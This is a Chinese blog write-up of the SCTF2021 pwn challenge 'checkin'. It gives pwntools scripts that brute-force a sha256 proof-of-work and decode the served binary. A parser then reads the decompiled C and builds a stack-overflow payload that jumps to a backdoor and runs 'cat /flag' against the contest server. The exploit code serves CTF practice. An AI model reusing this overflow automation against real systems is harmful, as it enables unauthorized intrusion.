[SCTF2021 pwn] checkin

最新推荐文章于 2023-06-20 10:24:24 发布
最新推荐文章于 2023-06-20 10:24:24 发布
阅读量1k 收藏 3
点赞数 1
分类专栏: CTF pwn 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52640415/article/details/122177889
版权

看上去说登录,以为是最简单的一题后来越作越想放弃,不过其它的也不会,用了半天的时间写了个程序,虽然不可能是预期的。但也算有结果。

先是给了个端口,然后就没有了。登上去提示爆4位sha256,这点没啥难度,由于有用的在后也所以肯定得写个小爆破程序,然后会返回base64编码的程序:

from pwn import *
import hashlib
from base64 import b64decode
import os

context(arch='amd64')

#nc 123.60.82.85 1447

p = remote('123.60.82.85', 1447)
context.log_level = 'debug'

p.recvuntil(b'sha256(xxxx + ')
tail = p.recv(16)
p.recv(5)
hx = p.recv(64)

ss = b'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'

print(hx)
print(tail)

def gethash():
    for i1 in ss:
        print(i1, end=' ')
        for i2 in ss:
            for i3 in ss:
                for i4 in ss:
                    vv = bytes([i1,i2,i3,i4]) + tail
                    #print(vv)
                    k = hashlib.sha256(vv).hexdigest().encode()
                    if k == hx:
                        print(b'OK', bytes([i1,i2,i3,i4]))
                        p.sendlineafter(b':', bytes([i1,i2,i3,i4]))
                        data = p.recvuntil(b'\n==end==', drop=True)
                        open('check1.out', 'wb').write(b64decode(data))
                        return bytes([i1,i2,i3,i4])

sss = gethash()
#p.sendlineafter(b':', sss)
os.chmod('check1.out', 0o777)

pause()  #未完待续

程序放到ida里发现没有难度,一个溢出题还有后门,直接溢出写后门就行了。可以你输入东西人家就超时了。前边看题目提示是20分钟重启一次还以为20分钟才超时,后来才知道错了,程序前头定的78秒。那这个活没法生工完成了。

记得原来看过一篇文章,说用angr自动分析程序,但是我的angr就一直没安上,又试了几次都没安上。反正呆着也是呆着,用程序自己解释吧,反正程序比较简单就那么几句话。

  1. input_val() 读数字空格结束,相当于scanf('%d', &v001);
  2. input_line()这个读入指定长度的串
  3. if有两种情况一种是计算一个算式,算式比较简单加减乘和异或得几,变量用input_val输入的值,如果不是乘法的话第1个数置结果(输入顺序不一定是第一)其它置0,如果是乘法的话置安第1个,第2个要置成1 。这种方法虽然不能包含所有可能算式,但这个题的算式都满足。
  4. 另一种是fksth进行比较,就是input_line输入的字符逐个异或后跟给定串比较,得到正确的数字,0结束。这个只需要处理第1个字符就行,想不为0就用异或数与第1个字符异或,这个肯定结果肯定就不为0了,如果想为0就直接输入异或的数
  5. 最后就是找一个变量的rbp-XXX的值小于可输入的长度,这样就能溢出了。在这输入padding+rbp+backdoor+padding就行了。

说是容易但困难重重,原来ljust对于有些字符会达不到预期。这个人工debug很累很累。有些估计认成utf8了,烦人的utf-8和python3的bytes类型,K。不知道开发的人是脑子进水了还是被踢了,非弄个转来转去的bytes .

最后的作法就是先用一个程序爆破sha256得到文件后,base64解码存成文件然后暂停,然后把程序拿到ida得到c文件,然后用另一个程序读c文件生成payload。一开始这个文件恢复执行读payload写入,然后就直接看到flag了。78秒,紧紧的,没有工具就这样,估计有angr的会完全不一样。为什么说要“站到巨人肩上”呢。哎,巨人安不上。

#!/usr/bin/python3  
# -*- coding: utf-8 -*-

import re
from pwn import *

fp = open('log.c', 'rb')

#var
vlist_name = []
vlist_offset = []
while True:
    line = fp.readline()

    if b'init' in line:
        break 
    if b'v' in line and b'rbp-' in line:
        s1 = line.index(b'v')
        s2 = line.index(b';', s1)
        s3 = line.index(b'[', s1)
        if s3 < s2:
            s2 = s3 
        vname = line[s1:s2]
        s4 = line.index(b'rbp-', s1 )
        s5 = line.index(b'h', s4)
        offset = int(line[s4+4:s5], 16)
        #print(vname, offset)
        vlist_name.append( vname )
        vlist_offset.append(offset)

def change(head, name):
    print('In:')
    #head = head + b'\r\n'
    print('head:', len(head))
    while True:
        line = fp.readline().strip()
        if b'printf' in line:
            p_name = name +b'\n'+ line 
            print(line)
            break 
    tmp = b''
    tdic_name = []
    tdic_val  = []
    stat = 0
    pad = 0
    pad_name = b''
    while True:
        line = fp.readline()

        if b'}' in line:
            #print('Return:', head)
            print('Return:')
            return 
        if b'input_line' in line:
            s1 = line.index(b'v')
            s2 = line.index(b',', s1)
            pad_name = line[s1:s2 ]
            s1 = line.index(b' ', s2)
            s2 = line.index(b'u', s1)
            if b'uLL' in line:
                s2 = line.index(b'uLL', s1)
            pad = int(line[s1+1: s2] , 16)
            print('------pad--------', hex(pad))
            #door
            if pad >= vlist_offset[vlist_name.index(pad_name)]+8+8:
                h1 = b'A'* (vlist_offset[vlist_name.index(pad_name)] )+p64(0) + p64(0x401362) + p64(0x40134c) 
                h1 = h1.ljust(pad, b'\x00')
                print(len(h1))
                open('ok.txt', 'wb').write(head+h1)
                print('Door:', head+h1 )
                print(p_name.decode())
                
                p = process('./check1.out')
                p.send(head+h1)
                p.sendline(b'cat /flag')
                p.interactive()
                exit()
        elif b'input_val()' in line:
            aline = line.strip().split(b' ')
            if b'=' in aline:
                tdic_name.append(aline[0])
                tdic_val.append(b'0 ')
            else:
                tdic_name.append(b'vxxx')
                tdic_val.append(b'0 ')
        elif b' ^=' in line:
            aline = line.strip().split(b' ')
            if len(aline[2]) > 7:
                continue 
            if b'v' not in aline[0]:
                continue
            tdic_name.append(aline[0])
            if b'LL;' in line:
                tdic_val.append(int(aline[2][:-3], 16))
            else:
                tdic_val.append(int(aline[2][:-2], 16))

        if b'if' in line:
            break 
   
    #print(tdic_name, tdic_val )
    #print('line:', line)
    #if a + b == c 
    if b'==' in line:
        s1 = line.index(b'v') 
        s2 = line.index(b' ', s1 )
        s3 = line.index(b')', s2 )
        if s3 < s2:
            s2 = s3 
        v1 = line[s1:s2 ]
        v3 = line[s2+1:s2+2] #运算符,乘法后边值为1,其它为0
        s3 = line.index(b'== ')
        s4 = line.index(b' ', s3+3 )
        v2 = line[s3+3:s4 ]
        #print(v3)
        if b'*' == v3:
            s3 = line.index(b'v', s2)
            s4 = line.index(b' ', s3 )
            s5 = line.index(b')', s3 )
            if s5 < s4:
                s4 = s5 
            v4 = line[s3:s4 ]
            print('v4:', v4)
            tdic_val[tdic_name.index(v4 )] = b'1 '
        
        h2 = b''.join(tdic_val ) #错
        tdic_val[tdic_name.index(v1 )] = v2 + b' '
        h1 = b''.join(tdic_val ) #对
        #print(h1, h2)
        print(len(h1), len(h2))
        change(head+h1, p_name)
        change(head+h2, p_name)
    
    elif b'fksth' in line:
        s1 = line.index(b'v')
        s2 = line.index(b',', s1)
        v1 = line[s1:s2 ]
        s1 = line.index(b'"',s2 )
        v2 = line[s1+1]
        if pad_name not in tdic_name:
            rval = 0
        else:
            rval = tdic_val[tdic_name.index(pad_name )]
        h1 = bytes([ rval ^ v2 ]) + (pad-1) * b'\x00'
        h2 = bytes([ rval ]) + (pad-1) * b'\x00'
        if b'!' in line:
            h1,h2 = h2,h1 
        print(len(h1), len(h2))
        change(head + h1, p_name)
        change(head + h2, p_name)
    
    #print(tdic_name, tdic_val )
            
change(b'', b'')        
#print(vlist)

然后回到第一段程序的后部

#上接pause 
payload = open('ok.txt', 'rb').read()
p.send(payload)

p.sendline(b'cat /flag')
p.interactive()

最后竟然玩出了生死时速的感觉。

石氏是时试
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwn】WMCTF2020 cfgo-CheckIn
Nothing
08-03 2262
拿到二进制后先解UPX,解完后发现程序还是很复杂,发现是cgo,做题的时候不知道有没有这种的插件支持,问了下做逆向的队友,似乎插件版本没有更新到这个版本,静态分析没有进展,先看看远程服务是跑啥的。 一个迷宫,走到旗子的位置就行了,一共100关,一波深搜就行了,解决了100关后出现了。 在二进制中搜索字符串无果,就当blind pwn做了,输入name后程序就退出了,可能存在的漏洞格式化字符串以及溢出,尝试发现没有格式化字符串漏洞,然后尝试溢出。当输入了0x78个字符后发现出现了报错信息。这里报错信息还是
2022 DASCTF X SU pwn checkin
yongbaoii的博客
04-28 400
栈溢出16个字节 栈迁移打setvbuf的got表 改成puts泄露libc 利用即可。
2021SCTF
unexpectedthing的博客
03-31 849
前言 复现环境:NSSCTF Loginme 考点 GO的模板注入 wp middleware.go package middleware import ( "github.com/gin-gonic/gin" ) func LocalRequired() gin.HandlerFunc { return func(c *gin.Context) { if c.GetHeader("x-forwarded-for") != "" || c.GetHeader("x-client-ip") !=
[SCTF 2023] 小部分
weixin_52640415的博客
06-19 878
RSA MSB oracle, AES padding oracle
SCTF 2023 の Misc の checkin の WP
Fab1an的博客
06-20 196
下载附件 直接资源管理器打开 发现flag文件,它们是同名的 用记事本打开,获得Flag
安恒杯pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
SCTF2020:SCTF2020
04-01
SCTF2020 SCTF2020
SCTF差分晶振15013896510
06-21
SCTF差分晶振15013896510 SCTF差分晶振15013896510是一款差分晶振器件,提供了高频率稳定性和低抖动特性,适用于高速应用场景。 电气参数: * 频率:106.25、125、155.52、161.1328、187.5、312.5MHz * 频率稳定...
sctf2014 misc400b.rar
09-30
sctf2014 misc400b.rar
SCTF2020 官方Write-up.pdf
07-08
SCTF的官方wp!SCTF的官方wp!如有侵权请私信撤回谢谢。
4位明文SHA_256加密破解。JAVA语言
04-14
JAVA语言。暴力破解,4位ASCII码符号(包括数字字母符号)组成的明文。内含字典生成代码。
SCTF2021__rceme
Sk1y的博客
03-28 1111
rceme 文章目录rceme先说下几个函数call_user_funcgetallheaders()可变参数绕过命令注入使用动态链接库so绕过disable_functions开启http服务(可选)利用php原生类进行文件读取参考链接 题目 <?php if(isset($_POST['cmd'])){ $code = $_POST['cmd']; if(preg_match('/[A-Za-z0-9]|\'|"|`|\ |,|-|\+|=|\/|\\|<|>|\$|\
SCTF 2021 | 冰天雪地 极限比拼
Cyberpeace的博客
12-13 3090
​​今年圣诞怎么过?! SCTF 2021 喊你来解锁圣诞限定赛事啦!!! 由操刀四届赛题的Syclover战队精心打造 48小时超长赛道容纳无限可能 妙趣横生的圣诞特供赛题限时出没 圣诞盲盒隐姓埋名等待发掘 IoT和区块链题目惊喜现身 静候技艺高强的师傅大展拳脚 圣诞氛围感和解题爽感一应俱全✨ 过硬质量和多元趣味相得益彰 这个圣诞节 SCTF 2021 约你乘上特制雪橇 冲破漫天风雪 环游极客世界! 2021年12月25日9:00-27日9:00 SCTF 2021 冰天雪地 极限比拼 世界上大概是没有
[CTF]SCTF2021 WEB复现(详细版)
Sapphire037的博客
01-09 4221
Loginme 下载附件得到源码,题目让我们本地访问,也就是要伪造ip,但是是有检测的,源码: package middleware import ( "github.com/gin-gonic/gin" ) func LocalRequired() gin.HandlerFunc { return func(c *gin.Context) { if c.GetHeader("x-forwarded-for") != "" || c.GetHeader("x-client-ip") != ""
SCTF2021__loginme
Sk1y的博客
03-11 856
SCTF2021__loginme 文章目录SCTF2021__loginme查看请求头模板渲染参考链接 赛后复现 docker创建容器,打开 提示我们需要localhost,但是我们使用XFF不可以,同时题目也给了附件,是go语言的,不是很会,这两天学了一下,来看下这个题目,复现下 题目给的附件: 打开看了main.go,这个源码是缺了一部分的,但是不影响做题(题目附件中缺了templates,赛后出题人将所有的源码放在了github,复现题目没问题) 之前没碰过go,边学边做吧 本题目用了一个gin
SCTF2021_Pwn_dataleak_WP
weixin_56434818的博客
12-27 619
SCTF2021_dataleak_WP 文章目录SCTF2021_dataleak_WP检查文件和保护ida查看ELF文件cJSON_PWNida查看libcjson.so利用思路exploit 检查文件和保护 64位小端序,动态链接。relro半开,没开canary,开了PIE和NX。 ida查看ELF文件cJSON_PWN int __cdecl __noreturn main(int argc, const char **argv, const char **envp) { int i; //
SCTF2021misc——This_is_A_tree
CNS-Enterprise BCC-1701-J
12-27 2656
下载附件得到压缩包,又是文件和文件夹嵌套 名为data的未知格式文件可以读出来 再结合文件夹名字,可以推测,整个压缩包内文件是一个非常明确的树结构 为防止出错,按照前序遍历进行遍历,将每一结点的data读出来,按树形结构放好 遍历完发现像是base64加密文本 Q2hpbmVzZSB0cmFkaXRpb25hbCBjdWx0dXJlIGlzIGJyb2FkIGFuZCBwcm9mb3VuZCEgU28gSSBXYW50IEdpdmUgWW91IE15IEZsYWcgQnV0IFlvdSBOZWVkI
[SCTF2021 misc] this_is_A_tree
weixin_52640415的博客
12-27 434
一般不参加两天的比赛,因为太难了。不过也有容易的,这个就是 名字说这是个树,打开文件是一个文件两个目录,目录下也是同样的结构,就是一个二叉树。 然后用程序遍历了一下,因为最右有base64尾标记==所以肯定不是后根,猜先根。一下就成功了 import os from pwn import * data = b'' #先根遍历 def getdata(d): global data tmp = open(d+'/data','rb').read() #print(tmp,
SCTF2021 pwn Christmas Bash 出题思路+预期解
令则
01-19 2126
SCTF2021 pwn Christmas Bash 出题思路+预期解
./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory
最新发布
09-02
这个错误通常发生在缺少 libstdc++.so.6 库文件时。解决这个问题的方法是安装 libstdc++ 库。你可以尝试使用以下命令来安装它: 对于 Ubuntu 或 Debian 系统: ``` sudo apt-get install libstdc++6 ``` 对于 CentOS 或 RHEL 系统: ``` sudo yum install libstdc++.so.6 ``` 请注意,根据你使用的操作系统和软件包管理器,命令可能会有所不同。确保你的系统上已经安装了适当的软件包管理器,并根据你的情况进行相应的调整。如果问题仍然存在,请提供更多的上下文信息,以便我可以提供更具体的解决方案。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值